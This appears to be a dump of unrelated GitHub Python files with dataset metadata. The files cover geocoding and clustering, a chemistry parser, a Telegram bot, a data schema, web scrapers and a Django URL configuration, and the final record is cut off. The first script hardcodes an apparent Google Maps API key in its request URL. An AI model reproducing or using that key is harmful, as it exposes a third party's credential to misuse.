pd.read_excel(file_path)\naddress_list = data['주소지'].tolist()\nprint(address_list)\n\nlocations_lat = [];\nlocations_lng = [];\n\nfor addr in address_list:\n URL = 'https://maps.googleapis.com/maps/api/geocode/json?key=AIzaSyBP5766yBfJirdZXwkm05u5_NcWFAoGa-k' \\\n '&sensor=false&language=ko&address={}'.format(addr)\n response = requests.get(URL)\n dj = response.json()\n lat = dj['results'][0]['geometry']['location']['lat']\n lng = dj['results'][0]['geometry']['location']['lng']\n locations_lat.append(lat)\n locations_lng.append(lng)\n\nser_lat = pd.Series(locations_lat)\nser_lng = pd.Series(locations_lng)\nframe = { 'lat': ser_lat, 'lng': ser_lng }\nresult = pd.DataFrame(frame)\n\nwcss = []\nfor i in range(1, 15):\n model = KMeans(n_clusters=i)\n model.fit(result[['lat', 'lng']])\n wcss.append(model.inertia_)\n\n#== USE DISPLAY ONLY ==\n#plt.figure(figsize=(12,6))\n#plt.plot(range(1, 15), wcss)\n#plt.title('The Elbow Method')\n#plt.xticks(range(1,15))\n#plt.xlabel('Clusters')\n#plt.ylabel('wcss')\n#plt.show()\n\nmodel = KMeans(n_clusters=12)\nmodel.fit(result[['lat', 'lng']])\nresult['Cluster'] = model.predict(result[['lat', 'lng']])\n\ndf12 = result[result.Cluster==0]\nprint(df12)\nprint(df12['lat'])\n\ndf12.groupby(['Cluster'], as_index=False).mean()\nclus_result = result.groupby(['Cluster'], as_index=False).mean()\nmean_result = clus_result.mean()\nmean_loc = [mean_result.lat,mean_result.lng]\n\nloc_result = clus_result[['lat','lng']]\n\nclus_list = loc_result.values.tolist()\n\n#== USE DISPLAY ONLY ==\n#map = folium.Map(location=mean_loc, zoom_start=8,tiles='Stamen Terrain')\n#for i in range(12):\n# folium.Marker(clus_list[i]).add_to(map)\n#map\n\n#temp_list = result.values.tolist()\n#map1 = folium.Map(location=mean_loc, zoom_start=8,tiles='Stamen Terrain')\n#for i in range(100):\n# folium.Marker(temp_list[i]).add_to(map1)\n#map1\n\n###===============================================\nimport json\nimport requests as r\n\nhttp_header = {\n 'user-agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1',\n 'x-requested-with': 'XMLHttpRequest'\n}\nsession = r.Session()\nsession.headers.update(http_header)\nsearch_distance_url_base = 'https://m.map.naver.com/spirra/findCarRoute.nhn?route=route3&output=json&result=web3&coord_type=latlng&search=2&car=0&mileage=12.4'\n\ndef SEARCH_DISTANCE_URL(start_point, end_point):\n return search_distance_url_base+'&start={}&destination={}'.format(start_point, end_point)\ndef SEARCH_POINT_URL(q):\n return 'https://m.map.naver.com/apis/search/poi?query={}&page=1'.format(q)\ndef GET_END_POINT(loc_list):\n x = loc_list[0]\n y = loc_list[1]\n return '{},{},1'.format(y, x)\ndef GET_INFO(start, end):\n res = session.get(SEARCH_DISTANCE_URL(GET_END_POINT(start),GET_END_POINT(end))).text\n res_dict = json.loads(res)\n target = res_dict['routes'][0]['summary']\n sec = target['duration']\n return sec\n\ndef relational_time_matrix(clusted_list):\n last_matrix = []\n for i in range(len(clus_list)):\n temp = []\n for j in range(len(clus_list)):\n if i is j:\n temp.append(0)\n elif(i > j):\n temp.append(last_matrix[j][i])\n else:\n temp.append(GET_INFO(clusted_list[i], clusted_list[j]))\n last_matrix.append(temp)\n return last_matrix\n\ntime_mat = relational_time_matrix(clus_list)\n\nnp_time = np.array(time_mat)\n\ndown_arr = np.asarray(np_time)\nnp.savetxt(\"time_relation.csv\", down_arr, fmt='%4d', delimiter=\",\")", "repo_name": "HEUMMAN/generateOptimalRoot", "sub_path": "timeRelationMatrix.py", "file_name": "timeRelationMatrix.py", "file_ext": "py", "file_size_in_byte": 3716, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_excel", "line_number": 9, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 46, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 83, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 121, "usage_type": "call"}]} +{"seq_id": "25064294414", "text": "# -*- coding: utf-8 -*-\n\"\"\"Parser implementation for the `CifCodNumbersCalculation` plugin.\"\"\"\nimport re\nimport traceback\n\nfrom aiida_codtools.calculations.cif_cod_numbers import CifCodNumbersCalculation\nfrom aiida_codtools.parsers.cif_base import CifBaseParser\n\n\nclass CifCodNumbersParser(CifBaseParser):\n \"\"\"Parser implementation for the `CifCodNumbersCalculation` plugin.\"\"\"\n\n # pylint: disable=inconsistent-return-statements\n\n _supported_calculation_class = CifCodNumbersCalculation\n\n def parse_stdout(self, filelike):\n \"\"\"Parse the content written by the script to standard out.\n\n :param filelike: filelike object of stdout\n :returns: an exit code in case of an error, None otherwise\n \"\"\"\n from aiida.orm import Dict\n\n numbers = {}\n content = filelike.read().strip()\n\n if not content:\n return self.exit_codes.ERROR_EMPTY_OUTPUT_FILE\n\n # The filelike should be in binary mode, so we should decode the bytes, assuming the content is in `utf-8`\n content = content.decode('utf-8')\n\n try:\n for line in content.split('\\n'):\n formula, identifier, count, _ = re.split(r'\\s+', line.strip())\n numbers[identifier] = {'count': int(count), 'formula': formula}\n except Exception: # pylint: disable=broad-except\n self.logger.exception('Failed to parse the numbers from the stdout file\\n%s', traceback.format_exc())\n return self.exit_codes.ERROR_PARSING_OUTPUT_DATA\n\n self.out('numbers', Dict(dict=numbers))\n\n return\n", "repo_name": "aiidateam/aiida-codtools", "sub_path": "src/aiida_codtools/parsers/cif_cod_numbers.py", "file_name": "cif_cod_numbers.py", "file_ext": "py", "file_size_in_byte": 1591, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "aiida_codtools.parsers.cif_base.CifBaseParser", "line_number": 10, "usage_type": "name"}, {"api_name": "aiida_codtools.calculations.cif_cod_numbers.CifCodNumbersCalculation", "line_number": 15, "usage_type": "name"}, {"api_name": "re.split", "line_number": 36, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 39, "usage_type": "call"}, {"api_name": "aiida.orm.Dict", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "8715109318", "text": "import os\nimport logging\nimport bot_config\nfrom aiogram import Bot, Dispatcher, types\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.types import ReplyKeyboardMarkup, KeyboardButton\nfrom aiogram import executor\nfrom django.core.files import File\nfrom works.models import Project\n\n\nlogging.basicConfig(level=logging.INFO)\nbot = Bot(token=bot_config.TOKEN)\nstorage = MemoryStorage()\ndp = Dispatcher(bot, storage=MemoryStorage())\n\n# pro = Project.objects.create(title='gera', description='hello world', image='media/projects/file_11.jpg', link='www.inst.com')\n# print(pro.description)\n\nproject_instance = Project()\n\n\nclass Project(StatesGroup):\n add_project = State()\n title = State()\n description = State()\n image = State()\n link = State()\n\n\n@dp.message_handler(commands=['start'])\nasync def cmd_start(message: types.Message):\n await message.answer(\n 'Привет! Хотите добавить проект?',\n reply_markup=ReplyKeyboardMarkup(\n resize_keyboard=True,\n keyboard=[\n [\n KeyboardButton(text=\"Да\"),\n KeyboardButton(text=\"Нет\"),\n ],\n ],\n )\n )\n await Project.add_project.set()\n\n\n@dp.message_handler(state=Project.add_project)\n@dp.message_handler(lambda message: message.text == 'Да')\nasync def add_project(message: types.Message, state: FSMContext):\n await message.answer('Введите название проекта:')\n project_instance.title = message.text\n await Project.title.set()\n\n\n@dp.message_handler(state=Project.title)\nasync def process_title(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['title'] = message.text\n await message.answer('Введите описание проекта:')\n project_instance.description = message.text\n await Project.description.set()\n\n\n@dp.message_handler(state=Project.description)\nasync def process_description(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['description'] = message.text\n await message.answer('Пришлите фотографию проекта:')\n project_instance.image = message.text\n await Project.image.set()\n\n@dp.message_handler(content_types=['photo'], state=Project.image)\nasync def process_photo(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n photo = message.photo[-1]\n photo_path = f\"media/projects/{data['title']}.jpg\"\n upload_dir = os.path.dirname(photo_path)\n if not os.path.exists(upload_dir):\n os.makedirs(upload_dir)\n await photo.download(destination_file=photo_path)\n data['image'] = photo_path\n await state.update_data(data) \n project_instance = Project() \n project_instance.image = photo_path\n await message.answer('Введите ссылку на проект:')\n await state.update_data(project_instance=project_instance) \n await Project.link.set()\n\n\n\n\n@dp.message_handler(state=Project.link)\nasync def process_link(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n project_instance = data['project_instance']\n data['link'] = message.text\n project_instance.link = message.text\n await state.finish()\n await message.answer('Проект сохранен!')\n\n\nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True)", "repo_name": "iimgera/telebot", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 3612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 14, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 14, "usage_type": "attribute"}, {"api_name": "aiogram.Bot", "line_number": 15, "usage_type": "call"}, {"api_name": "bot_config.TOKEN", "line_number": 15, "usage_type": "attribute"}, {"api_name": "aiogram.contrib.fsm_storage.memory.MemoryStorage", "line_number": 16, "usage_type": "call"}, {"api_name": "aiogram.Dispatcher", "line_number": 17, "usage_type": "call"}, {"api_name": "aiogram.contrib.fsm_storage.memory.MemoryStorage", "line_number": 17, "usage_type": "call"}, {"api_name": "works.models.Project", "line_number": 22, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.StatesGroup", "line_number": 25, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 26, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 27, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 28, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 29, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 30, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 34, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 34, "usage_type": "name"}, {"api_name": "aiogram.types.ReplyKeyboardMarkup", "line_number": 37, "usage_type": "call"}, {"api_name": "aiogram.types.KeyboardButton", "line_number": 41, "usage_type": "call"}, {"api_name": "aiogram.types.KeyboardButton", "line_number": 42, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 52, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 52, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 52, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 59, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 59, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 59, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 68, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 68, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 68, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 76, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 76, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 76, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 82, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 96, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 96, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 96, "usage_type": "name"}, {"api_name": "aiogram.executor.start_polling", "line_number": 106, "usage_type": "call"}, {"api_name": "aiogram.executor", "line_number": 106, "usage_type": "name"}]} +{"seq_id": "6323696696", "text": "import numpy as np\n\nfrom nomad.metainfo import (\n Quantity,\n Section,\n SubSection)\n# from nomad.datamodel.data import ArchiveSection\n\nfrom .. import BaseMeasurement, LibraryMeasurement\n\n\nclass Ellipsometry(BaseMeasurement):\n '''Ellipsometry'''\n\n m_def = Section(\n a_eln=dict(hide=['certified_values', 'certification_institute']))\n\n data_file = Quantity(\n type=str,\n shape=['*'],\n a_eln=dict(component='FileEditQuantity'),\n a_browser=dict(adaptor='RawFileAdaptor'))\n\n def normalize(self, archive, logger):\n self.method = \"Ellipsometry\"\n super(Ellipsometry, self).normalize(archive, logger)\n\n\nclass EllipsometryLibrary(LibraryMeasurement):\n '''Ellipsometry Measurement'''\n\n m_def = Section(\n a_eln=dict(hide=['certified_values', 'certification_institute']))\n\n def normalize(self, archive, logger):\n super(EllipsometryLibrary, self).normalize(archive, logger)\n self.method = \"Ellipsometry\"\n", "repo_name": "RoteKekse/nomad-baseclasses", "sub_path": "baseclasses/characterizations/ellipsometry.py", "file_name": "ellipsometry.py", "file_ext": "py", "file_size_in_byte": 987, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "nomad.metainfo.Section", "line_number": 15, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 18, "usage_type": "call"}, {"api_name": "nomad.metainfo.Section", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "33823528970", "text": "import urllib2\nimport urllib\nimport re\nimport os\nimport sys\nfrom bs4 import BeautifulSoup\n\ndef getInfo(filename, cnt):\n\tfp = open(filename, 'r')\n\t#title = fp.readline()\n\thtml = fp.read()\n\tfp.close()\n\toutfile = \"src/result/\" + str(cnt) + \".txt\"\n\tfw = open(outfile, 'w')\n\tinfo = BeautifulSoup(html, \"lxml\")\n\ttrList = info.find_all(\"tr\")\n\tcnt = 0\n\t#fw.write(title)\n\tfor tr in trList:\n\t\tfout = ''\n\t\tcnt = cnt + 1\n\t\tcontent = False\n\t\thead = 0\n\t\tif (cnt > 1):\n\t\t\ttag = \"\"\n\t\t\tfor string in tr.stripped_strings:\n\t\t\t\tif head == 0:\n\t\t\t\t\ttag = string.encode('utf-8')\n\t\t\t\t\tfout = fout + string.encode('utf-8') + \":\"\n\t\t\t\telse:\n\t\t\t\t\ttemp = string.strip()\n\t\t\t\t\tstart = temp.find(\"(\")\n\t\t\t\t\tif start != -1:\n\t\t\t\t\t\ttemp = temp[:start] + temp[start + 1 : ]\n\t\t\t\t\tend = temp.find(\")\")\n\t\t\t\t\tif end == len(temp) - 1:\n\t\t\t\t\t\ttemp = temp[: -1]\n\t\t\t\t\tstart = temp.find(\",\")\n\t\t\t\t\tif start == 0:\n\t\t\t\t\t\ttemp = temp[1:]\n\t\t\t\t\tend = temp.find(\",\")\n\t\t\t\t\tif end == len(temp) - 1:\n\t\t\t\t\t\ttemp = temp[: -1]\n\t\t\t\t\tif temp == \"[1]\" or temp == \"[2]\" or temp == \"[3]\" or temp == \"[4]\" or temp == \"[5]\" or temp == \"[6]\" or temp == \"[7]\" or temp == \"[8]\" or temp == \"[9]\":\n\t\t\t\t\t\ttemp = \"\"\n\t\t\t\t\tif temp == \"\":\n\t\t\t\t\t\thead = head + 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif (tag == \"Born\") and (head == 1):\n\t\t\t\t\t\tif not temp[0].isdigit():\n\t\t\t\t\t\t\thead = head + 1\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\tif temp !=\"\":\n\t\t\t\t\t\tfout = fout + temp.encode('utf-8') + \";\"\n\t\t\t\t\t\tcontent = True\n\t\t\t\thead = head + 1\n\t\telse:\n\t\t\tlabel = True\n\t\t\tfor title in tr.stripped_strings:\n\t\t\t\tif label:\n\t\t\t\t\tfw.write(title.encode('utf-8') + \"\\n\")\n\t\t\t\t\tlabel = False\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\tif content:\n\t\t\tfw.write(fout + \"|\\n\")\n\tfw.close()\n\ndef main():\n\tfor i in range(1, 10001):\n\t\tfilename = \"src/doc/\" + str(i) + \".html\"\n\t\tgetInfo(filename, i)\n\nif __name__ == \"__main__\":\n\tmain()", "repo_name": "Bran-Sun/search-engine", "sub_path": "listFile.py", "file_name": "listFile.py", "file_ext": "py", "file_size_in_byte": 1770, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "bs4.BeautifulSoup", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "29801336061", "text": "from bs4 import BeautifulSoup\nimport requests\nimport urllib.parse as u\nimport pandas as pd\n\nn = int(input('Enter Number of Students: '))\nURL = 'http://gct.ac.in/result'\ns = requests.Session()\n\ndef fetch(url, data=None):\n if data is None:\n return s.get(url).content\n else:\n return s.post(url, data=data).content\n\nsoup = BeautifulSoup(fetch(URL),'lxml')\nform = soup.findAll('form')\n\nfields = form[1].findAll('input')\n\nformdata = dict( (field.get('name'), field.get('value')) for field in fields)\n\nsheet = pd.read_csv('/Users/amrs/Desktop/sampel.csv') #The input CSV file location to read Register Numbers\nreg_arr = []\nfor i in sheet['Register No']:\n reg_arr.append(str(i))\n\nprint('\\nRegister Numbers submitted. Wait for a while...\\n')\nprint('--------------------------------------------------------------------------------\\n')\n\ndf = pd.DataFrame()\n\nfor regno in reg_arr: \n formdata['reg_no'] = regno #register numbers\n formdata['btn'] = 'Submit'\n\n posturl = u.urljoin(URL, form[1]['action'])\n\n r = s.post(posturl, data=formdata)\n\n tempSoup = BeautifulSoup(r.text,'lxml')\n\n tablediv = tempSoup.find('div', {'class':'result_tbl'})\n\n tablesoup = BeautifulSoup(str(tablediv),'lxml')\n table = tablesoup.findAll('table')[1:]\n\n colnames = []\n coldata = []\n\n for rows in table[1].findAll('tr')[1:]:\n cols = rows.findAll('td')\n for c in cols:\n tempdata = c.find('div')\n coldata.append(tempdata.find(text=True))\n\n subcode = ['Registration Number','Name']\n for a in range(0,len(coldata),5):\n subcode.append(coldata[a])\n temp = []\n\n for rows in table[2].findAll('tr'):\n cols = rows.findAll('td')\n for c in cols:\n temp.append(c.find(text=True))\n subcode.append(temp[0])\n \n for rows in table[0].findAll('tr'):\n cols = rows.findAll('td')\n for c in cols:\n colnames.append(c.find(text=True))\n\n #print('-------------------------------------------------------------------------------')\n reg_name_gradepts = []\n reg_name_gradepts.append(colnames[1])\n reg_name_gradepts.append(colnames[3])\n for a in range(3,len(coldata),5):\n reg_name_gradepts.append(coldata[a])\n\n #print('-------------------------------------------------------------------------------')\n reg_name_gradepts.append(temp[1])\n\n df2 = pd.DataFrame([reg_name_gradepts],columns=subcode)\n df = df.append(df2,ignore_index=True)\n\ntemplist = list(df.columns.values)\ncolorder = [templist[-1]]+[templist[-2]]+templist[:-2]\n\ndf = df[colorder]\ndf.to_csv('/Users/amrs/Desktop/out.csv') #The output CSV file location where the Results of Students are stored\nprint('Successfully created Sheet!\\n')\n", "repo_name": "amrs-tech/Exam-Result-Extractor", "sub_path": "form_submit.py", "file_name": "form_submit.py", "file_ext": "py", "file_size_in_byte": 2748, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.Session", "line_number": 8, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 31, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 37, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 37, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 41, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "16936185162", "text": "\"\"\"Drosometer URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\n\nfrom django.urls import path, include\nfrom Droso import views\nfrom django.conf import settings\nfrom Droso.views import loginUser\nfrom django.conf.urls.static import static\n\nfrom django.contrib.auth.views import PasswordResetView, PasswordResetDoneView, PasswordResetConfirmView, \\\n PasswordResetCompleteView\n\nfrom django.contrib.auth import views as auth_views\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path('', views.main),\n\n # Login Paths\n path('login', loginUser),\n path('logout', views.logoutUser),\n path('register', views.register_page),\n\n # Wing Paths\n path('w_dimen', views.wingdimen),\n path('bar', views.w_bar),\n path('w_dimen2', views.wingdimen2),\n path('details', views.detail_dimen),\n\n path('w_shape', views.wingshape),\n path('w_shape2', views.wingshape2),\n path('w_shape_fb', views.shape_output),\n path('out', views.shape_output),\n\n path('w_bristles', views.wingbristles),\n path('w_bristles2', views.wingbristles2),\n path('cropper_wing', views.cropper_bristles),\n\n path('f_eye', views.eye_f),\n path('f_wing', views.wing_f),\n\n # Other paths\n path('aboutus', views.myteam),\n path('contactus', views.c_us),\n path('feedback', views.f_b),\n # path('wing', views.wingfront),\n # path('eye', views.eyefront),\n\n # Eye Paths\n path('e_omat', views.eye_omat),\n path('e_omat2', views.eye_omat2),\n path('cropper_eye', views.cropper_eye),\n\n path('eye_col', views.eye_col),\n path('col2', views.eye_col2),\n path('e_c_o', views.eye_col_output),\n\n path('e_dimen', views.eyedimen),\n path('e_dimen2', views.eyedimen2),\n path('e_d_o', views.e_dimen_out),\n\n # Dashboard Paths\n path('w_dashboard', views.wing_dashboard),\n path('e_dashboard', views.eye_dashboard),\n\n # RingAssay Paths\n path('ring_assay', views.ring_assay_1),\n path('ring_assay2', views.ring_assay_2),\n path('ring_out', views.ring_out),\n\n # path('f_thorax', views.thorax_f),\n\n # path('check', views.fetch_data),\n\n # path('password_reset/', auth_views.PasswordResetView.as_view(\n # template_name='templates/user/password_reset.html'), name='password_reset'),\n # path('password_reset/done/', auth_views.PasswordResetDoneView.as_view(\n # template_name='templates/user/password_reset_done.html'), name='password_reset_done'),\n # path('reset///', auth_views.PasswordResetConfirmView.as_view(\n # template_name='templates/user/password_reset_confirm.html'), name='password_reset_confirm'),\n # path('reset/done/', auth_views.PasswordResetCompleteView.as_view(\n # template_name='templates/user/password_reset_complete.html'), name='password_reset_complete'),\n\n path('generate-pdf/', views.generate_pdf_view, name='generate_pdf'),\n path('data', views.dowdata),\n ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n", "repo_name": "buttawb/Makkhimeter-FYP", "sub_path": "Drosometer/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 4431, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 30, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "Droso.views.main", "line_number": 31, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "Droso.views.loginUser", "line_number": 34, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "Droso.views.logoutUser", "line_number": 35, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 35, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "Droso.views.register_page", "line_number": 36, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 36, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "Droso.views.wingdimen", "line_number": 39, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 39, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 40, "usage_type": "call"}, {"api_name": "Droso.views.w_bar", "line_number": 40, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 40, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 41, "usage_type": "call"}, {"api_name": "Droso.views.wingdimen2", "line_number": 41, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 41, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 42, "usage_type": "call"}, {"api_name": "Droso.views.detail_dimen", "line_number": 42, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 42, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 44, "usage_type": "call"}, {"api_name": "Droso.views.wingshape", "line_number": 44, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 44, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "Droso.views.wingshape2", "line_number": 45, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 45, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 46, "usage_type": "call"}, {"api_name": "Droso.views.shape_output", "line_number": 46, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 46, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "Droso.views.shape_output", "line_number": 47, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 47, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 49, "usage_type": "call"}, {"api_name": "Droso.views.wingbristles", "line_number": 49, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 49, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 50, "usage_type": "call"}, {"api_name": "Droso.views.wingbristles2", "line_number": 50, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 50, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 51, "usage_type": "call"}, {"api_name": "Droso.views.cropper_bristles", "line_number": 51, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 51, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 53, "usage_type": "call"}, {"api_name": "Droso.views.eye_f", "line_number": 53, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 53, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 54, "usage_type": "call"}, {"api_name": "Droso.views.wing_f", "line_number": 54, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 54, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 57, "usage_type": "call"}, {"api_name": "Droso.views.myteam", "line_number": 57, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 57, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 58, "usage_type": "call"}, {"api_name": "Droso.views.c_us", "line_number": 58, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 58, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 59, "usage_type": "call"}, {"api_name": "Droso.views.f_b", "line_number": 59, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 59, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 64, "usage_type": "call"}, {"api_name": "Droso.views.eye_omat", "line_number": 64, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 64, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 65, "usage_type": "call"}, {"api_name": "Droso.views.eye_omat2", "line_number": 65, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 65, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 66, "usage_type": "call"}, {"api_name": "Droso.views.cropper_eye", "line_number": 66, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 66, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 68, "usage_type": "call"}, {"api_name": "Droso.views.eye_col", "line_number": 68, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 68, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 69, "usage_type": "call"}, {"api_name": "Droso.views.eye_col2", "line_number": 69, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 69, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 70, "usage_type": "call"}, {"api_name": "Droso.views.eye_col_output", "line_number": 70, "usage_type": "attribute"}, {"api_name": "Droso.views", 